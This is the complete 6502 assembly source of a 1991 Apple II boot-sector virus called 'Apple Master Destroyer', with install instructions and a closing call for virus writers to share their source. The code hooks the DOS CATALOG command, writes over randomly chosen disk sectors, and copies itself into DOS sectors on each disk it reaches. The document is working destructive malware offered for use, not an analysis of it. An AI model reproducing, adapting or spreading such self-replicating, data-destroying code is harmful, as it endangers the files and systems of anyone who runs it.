********************************
*                              *
*      VIRUS FOR APPLE II      *
*    (C)1991 BY THE SHARK      *
*                              *
*   APPLE MASTER DESTORIER !!  *
*          VRSION 1.0          *
*                              *
* GREETINGS FOR DARK AVENGER !!*
*                              *
********************************
*
 ORG $9900
********************************
*                              *
* MOVE VIRUS INTO $9900        *
* MOVSB 256D                   *
*                              *
********************************
*
 LDX #$00
LOOP LDA $9D00,X
 STA $9900,X
 INX
 BNE LOOP
********************************
*                              *
* JUMP TO NEW POSITION         *
*                              *
********************************
*
 JMP $990E
********************************
*                              *
* READ TRACK 02 SECTOR $0C IN  *
* $9D00 - STANDART DOS SECTOR  *
* HI WAS CHANGE WITH VIRUS IN  *
* TRACK 00 SECTOR $0C !!       *
*                              *
********************************
*
 LDA #$02
 STA IOBTRACK
 LDA #$0A
 STA IOBSECTOR
 LDA #$00
 STA BUFFERL
 LDA #$9D
 STA BUFFERH
 JSR READ
********************************
*                              *
* GET "CATALOG" ENTRY POINT &  *
* CHANGE IT WHIT VIRUS ENTRY   *
* POINT ($9932)                *
*                              *
********************************
*
 LDA #LOOK
 STA CATCH
 LDA #>LOOK
 STA CATCH+1
 JMP COLDDOS
********************************
*                              *
* VIRUS (CATALOG) ENTRY POINT  *
*                              *
********************************
*
********************************
*                              *
* SAVE ALL REGISTERS - A&X&Y   *
*                              *
********************************
*
LOOK JSR SAVE
********************************
*                              *
* GET RANDOM SECTOR AND TRACK  *
* FOR DESTROY !!!!!            *
*                              *
********************************
*
********************************
*                              *
* GET TRACK FROM $4E - RANDOM  *
* IF NO CORRECT LSR            *
*                              *
********************************
 LDA $4E
 CMP #$23
 BLT FORMAT
 LSR
 LSR
 CMP #$23
 BGE INFECT
FORMAT STA IOBTRACK
 LDA $4F
 CMP #$10
 BGE DIV
DESTROY STA IOBSECTOR
 JSR WRITE
 JMP INFECT
DIV LSR
 LSR
 CMP #$10
 BGE INFECT
 BLT DESTROY
********************************
*                              *
* THIS PART OF PROGRAM INFECT  *
* THE DISK !!!                 *
*                              *
********************************
*
INFECT LDA #$00
 STA IOBTRACK
 STA BUFFERL
 LDA #$0C
 STA IOBSECTOR
 LDA #$96
 STA BUFFERH
 JSR READ
********************************
*                              *
* CALL PROGRAM FOR CHECK THE   *
* DOS - WHAT DOS IS ?          *
*                              *
********************************
*
 JSR CHECK
 LDA #$0C
 STA IOBSECTOR
 LDA #$99
********************************
*                              *
* THIS INSTRUCTION IS FIXED    *
* DON'T MOVE IT FROM THIS PLACE*
* THE VIRUS IS NOT WORK !!!!   *
*                              *
********************************
*
 JMP GOON
 NOP
 JMP $9D00
 HEX D4C8C5
 JMP $9D00
********************************
*
GOON STA BUFFERH
 JSR WRITE
 LDX #$0A
 STX IOBSECTOR
 LDX #$02
 STX IOBTRACK
 LDA #$96
 STA BUFFERH
 JSR WRITE
********************************
*                              *
* RESTORE REGISTERS AND GOTO   *
* "CATALOG"                    *
*                              *
********************************
*
ENDV JSR RESTORE
 JSR $A2AA
 RTS
 STA IOBSECTOR
********************************
*                              *
* THIS PART READ SECTOR !!     *
*                              *
********************************
*
READ LDA #$01
 JSR SET
 BCS READ
 RTS
********************************
*                              *
* THIS PART WRITE SECTOR       *
*                              *
********************************
*
WRITE LDA #$02
SET STA MODE
 LDA #$00
 STA IOBVOLUME
 LDA #$B7
 LDY #$E8
 JSR RWTS
 LDA #$00
 STA $48
 RTS
********************************
*                              *
* THIS PART LOOK FOR KNOW DOS  *
*                              *
********************************
*
CHECK LDA CHKPOINT1
 CMP #$0F
 BEQ SETUP
 LDA #$0A
 STA POINT
 JSR READ
 LDA CHKPOINT
 CMP #$A8
 BNE GRAFF
 RTS
SETUP LDA #$0C
 STA POINT
 RTS
END PLA
 PLA
 BNE ENDV
GRAFF LDA #$0F
 STA POINT
 JSR READ
 LDA CHKPOINT
 CMP #$67
 BNE END
 RTS
 HEX D3C8C1D2CBA1
*

CHKPOINT1 = $9634
CHKPOINT = $967C
POINT = $9974
COLDDOS = $9D84
CATCH = $A571
RWTS = $B7B5
IOBVOLUME = $B7EB
IOBTRACK = $B7EC
IOBSECTOR = $B7ED
BUFFERL = $B7F0
BUFFERH = $B7F1
MODE = $B7F4
SAVE = $FF4A
RESTORE = $FF3F
********************************
*                              *
* HOW TO INSTALL ?             *
*                              *
*IF YOU WANT INSTALL THIS VIRUS*
*YOU FIRST MUST ASSEMBLY SOURCE*
*FROM ADRESS $9900(THE OBJ CODE*
*MUST BY IN $9900)             *
*THIS IS ALL !!                *
*NOW YOU MUST TYPE FROM MONITOR*
*($9925G) FROM THIS MOMENT THE *
*VIRUS IS ACTIVATED !!!!       *
*INSERT DISK WITH DOS AND TYPE *
*"CATALOG" - DISK IS INFECTED !*
*                              *
********************************
*                              *
********************************
*                              *
*NOTE:                         *
*FOR ALL VIRUSMAKEERS          *
*WRITE IN YOUR VIRUS FULL      *
*INFORMATION FOR WORK OF VIRUS *
*THIS IS HELP FOR ANOTHER      *
*VIRUSMAKERS AND GIVE YOUR     *
*ASM - FILE TO EVERYBODY !!!!  *
*                              *
********************************
